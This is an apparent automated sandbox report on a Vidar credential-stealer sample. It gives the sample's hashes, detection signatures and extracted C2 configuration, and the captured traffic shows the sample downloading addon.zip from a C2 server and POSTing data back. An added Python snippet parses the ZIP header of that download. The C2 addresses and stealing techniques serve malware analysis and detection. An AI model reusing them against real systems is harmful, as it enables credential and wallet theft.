Windows Analysis Report
06625899.exe

Overview

General Information

Sample Name: 06625899.exe
Analysis ID: 877001
MD5: 22cd094d925fb41f446ed4db24cc8c35
SHA1: c316b3fa0e1357ed5815002b0354e8503d5ee038
SHA256: 9edb64bf310212bffcc2fa176b22b570d071fb38873292a1a1ada19f8536231c
Infos:

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected Vidar stealer
Detected unpacking (changes PE section rights)
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Uses known network protocols on non-standard ports
Machine Learning detection for sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
Extensive use of GetProcAddress (often used to hide API calls)
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Uses Microsoft's Enhanced Cryptographic Provider

Classification

AV Detection

Source: 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199508624021", "https://t.me/looking_glassbot"], "Botnet": "667e85c8112da056f901292caf82b3ed"}
Source: 06625899.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00415040 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_00415040
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00409EC0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,_memset,CryptBinaryToStringA, 0_2_00409EC0
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00415180 _malloc,_malloc,CryptUnprotectData, 0_2_00415180
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00401430 _memset,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA, 0_2_00401430
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00414D80 _memset,lstrlen,CryptStringToBinaryA,lstrcat,lstrcat, 0_2_00414D80
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00414FC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00414FC0

Compliance

Source: C:\Users\user\Desktop\06625899.exe Unpacked PE file: 0.2.06625899.exe.400000.0.unpack
Source: 06625899.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49684 version: TLS 1.2
Source: Binary string: C:\yukigusorefu\murebobunuxac\tuju payuxax-nus\w.pdb source: 06625899.exe
Source: Binary string: uDC:\yukigusorefu\murebobunuxac\tuju payuxax-nus\w.pdb source: 06625899.exe
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00424100 FindFirstFileW,_wcslen,FindNextFileW,_wcslen,FindNextFileW, 0_2_00424100
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00416500 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00416500
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_004118B0 _memset,lstrcat,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_004118B0
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00416B10 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,_memset,_memset,_memset,_memset,_memset,_memset, 0_2_00416B10
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00411B90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00411B90
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_0040BC20 wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_strlen,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlen,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 0_2_0040BC20
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00411DD0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,_memset,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00411DD0
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_0041AFF0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,_memset,_memset,FindNextFileA,FindClose, 0_2_0041AFF0
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_0040B190 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcat,lstrlen,_memset, 0_2_0040B190
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_004162F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_004162F0
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00416770 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,StrCmpCA,StrCmpCA,DeleteFileA,FindNextFileA,FindClose, 0_2_00416770
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00409F60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00409F60
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_0040D1C0 _memset,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,lstrcpy,_strlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen, 0_2_0040D1C0
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\06625899.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

Networking

Source: unknown Network traffic detected: HTTP traffic on port 49685 -> 30303 (3 identical entries)
Source: unknown Network traffic detected: HTTP traffic on port 30303 -> 49685 (3 identical entries)
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199508624021
Source: Malware configuration extractor URLs: https://t.me/looking_glassbot
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View IP Address: 188.34.154.187 188.34.154.187
Source: Joe Sandbox View IP Address: 149.154.167.99 149.154.167.99
Source: global traffic HTTP traffic detected:
    GET /looking_glassbot HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
    Host: t.me
Source: global traffic HTTP traffic detected:
    GET /667e85c8112da056f901292caf82b3ed HTTP/1.1
    User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
    Host: 188.34.154.187:30303
Source: global traffic HTTP traffic detected:
    GET /addon.zip HTTP/1.1
    User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
    Host: 188.34.154.187:30303
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----0606627400761024
    User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
    Host: 188.34.154.187:30303
    Content-Length: 143185
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic TCP traffic: 192.168.2.3:49685 -> 188.34.154.187:30303
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown Network traffic detected: HTTP traffic on port 49684 -> 443
Source: global traffic HTTP traffic detected:
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 28 May 2023 08:46:23 GMT
    Content-Type: application/zip
    Content-Length: 2685679
    Last-Modified: Mon, 12 Sep 2022 13:14:59 GMT
    Connection: keep-alive
    ETag: "631f30d3-28faef"
    Accept-Ranges: bytes
    Data Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf
    Note: the body starts with the ZIP local file header signature 50 4b 03 04 ("PK\x03\x04"), and the first entry name in the dump (66 72 65 65 62 6c 33 2e 64 6c 6c) decodes to freebl3.dll, i.e. the addon.zip served by 188.34.154.187:30303 is the NSS/runtime DLL bundle whose names also appear as a memory string later in this section. The nginx ETag "631f30d3-28faef" is mtime-size in hex and matches the Last-Modified and Content-Length values.
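
The response body above is cut off after a few hundred bytes, but its first 30 bytes are a complete ZIP local file header, which is enough to identify the first file the stealer downloads before the archive is fully transferred. The following Python is an added example written for this page (it is not Joe Sandbox code and not part of the report); it parses the first 45 bytes of the Data Raw dump above, copied verbatim, and decodes the header fields, including the MS-DOS packed timestamp. The entry name it recovers, freebl3.dll, is consistent with the DLL list string (freebl3.dll, mozglue.dll, msvcp140.dll, nss3.dll, softokn3.dll, vcruntime140.dll) found in the sample's memory later in this section.

```python
import struct
import datetime

# Constructed input: the first 45 bytes of the "Data Raw" dump for the
# /addon.zip response in this report, copied verbatim.
ADDON_ZIP_HEAD = bytes.fromhex(
    "50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 "
    "50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c"
)

# ZIP local file header (APPNOTE 4.3.7): signature, version needed, flags,
# method, DOS time, DOS date, CRC-32, compressed size, uncompressed size,
# file-name length, extra-field length. Little-endian, 30 bytes.
LOCAL_FILE_HEADER = struct.Struct("<IHHHHHIIIHH")
LOCAL_FILE_SIG = 0x04034B50          # b"PK\x03\x04"
METHODS = {0: "stored", 8: "deflate"}


def dos_datetime(dos_time, dos_date):
    """Decode the MS-DOS packed time/date pair stored in ZIP headers."""
    return datetime.datetime(
        1980 + (dos_date >> 9), (dos_date >> 5) & 0xF, dos_date & 0x1F,
        dos_time >> 11, (dos_time >> 5) & 0x3F, (dos_time & 0x1F) * 2)


def parse_first_entry(blob):
    """Parse the first local file header from a (possibly truncated) ZIP body."""
    if len(blob) < LOCAL_FILE_HEADER.size:
        raise ValueError("need at least 30 bytes, got %d" % len(blob))
    (sig, version, flags, method, mtime, mdate, crc32, csize, usize,
     name_len, extra_len) = LOCAL_FILE_HEADER.unpack_from(blob)
    if sig != LOCAL_FILE_SIG:
        raise ValueError("not a ZIP local file header: 0x%08x" % sig)
    if flags & 0x1:
        raise ValueError("entry is encrypted")      # not the case here, but check
    name_start = LOCAL_FILE_HEADER.size
    if len(blob) < name_start + name_len:
        raise ValueError("dump is truncated inside the file name")
    name = blob[name_start:name_start + name_len].decode("cp437")
    return {
        "name": name,
        "method": METHODS.get(method, "other(%d)" % method),
        "compressed": csize,
        "uncompressed": usize,
        "crc32": crc32,
        "modified": dos_datetime(mtime, mdate),
        "version_needed": version,
        # where the compressed data begins relative to the header
        "data_offset": name_start + name_len + extra_len,
    }


if __name__ == "__main__":
    entry = parse_first_entry(ADDON_ZIP_HEAD)
    for k, v in entry.items():
        print("%-15s %s" % (k, hex(v) if k == "crc32" else v))
```

Only the first entry is visible here; the remaining names would need the central directory at the end of the 2685679-byte archive, which the report does not include.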
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.46.113 (3 identical entries)
Source: unknown TCP traffic detected without corresponding DNS query: 188.34.154.187 (47 identical entries)
Source: 06625899.exe, 00000000.00000003.402473646.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://188.34.154.187:30303
Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://188.34.154.187:30303/
Source: 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://188.34.154.187:30303//
Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://188.34.154.187:30303/667e85c8112da056f901292caf82b3ed
Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://188.34.154.187:30303/667e85c8112da056f901292caf82b3edZ5
Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://188.34.154.187:30303/:
Source: 06625899.exe, 00000000.00000002.413121737.00000000031BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://188.34.154.187:30303/CVOHV.xlsx
Source: 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://188.34.154.187:30303/T
Source: 06625899.exe, 00000000.00000003.404755514.00000000008F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://188.34.154.187:30303/addon.zip
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://188.34.154.187:30303/addon.zip&u;y
Source: 06625899.exe, 00000000.00000003.404755514.00000000008F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://188.34.154.187:30303/addon.zip0
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://188.34.154.187:30303/addon.zip=u&y
Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://188.34.154.187:30303/e5
Source: 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://188.34.154.187:30303/n
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://188.34.154.187:30303;
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://23.88.46.113/667e85c8112da056f901292caf82b3ed
Source: 06625899.exe, 00000000.00000002.412555113.00000000008CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://23.88.46.113/667e85c8112da056f901292caf82b3ed8
Source: 06625899.exe, 00000000.00000002.412555113.00000000008CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://23.88.46.113/667e85c8112da056f901292caf82b3edx
Source: 06625899.exe, 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://23.88.46.113:80
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://23.88.46.113:80/
Source: 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://23.88.46.113:80peppppzxc.ziphttps://t.me/looking_glassbotlookataddon.zipMozilla/5.0
Source: 06625899.exe, 00000000.00000002.412510711.0000000000838000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: http://23.88.46.113:8A
Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000003.404755514.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000003.402473646.0000000000900000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsup30303/667e85c8112da056f901292caf82b3ed
Source: 06625899.exe, 00000000.00000002.423731237.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 50764714324176067669882221.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 50764714324176067669882221.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 50764714324176067669882221.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 50764714324176067669882221.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://freebl3.dllmozglue.dllmsvcp140.dllnss3.dllsoftokn3.dllvcruntime140.dll
Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: 06625899.exe, 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199508624021
Source: 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199508624021openopen_NULL%s
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/V
Source: 06625899.exe, 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000003.402473646.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000003.402473646.0000000000900000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/looking_glassbot
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/looking_glassbotC
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/looking_glassbotJ
Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown DNS traffic detected: queries for: t.me
Source: C:\Users\user\Desktop\06625899.exe Code function: 0_2_00414330 StrCmpCA,GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 0_2_00414330
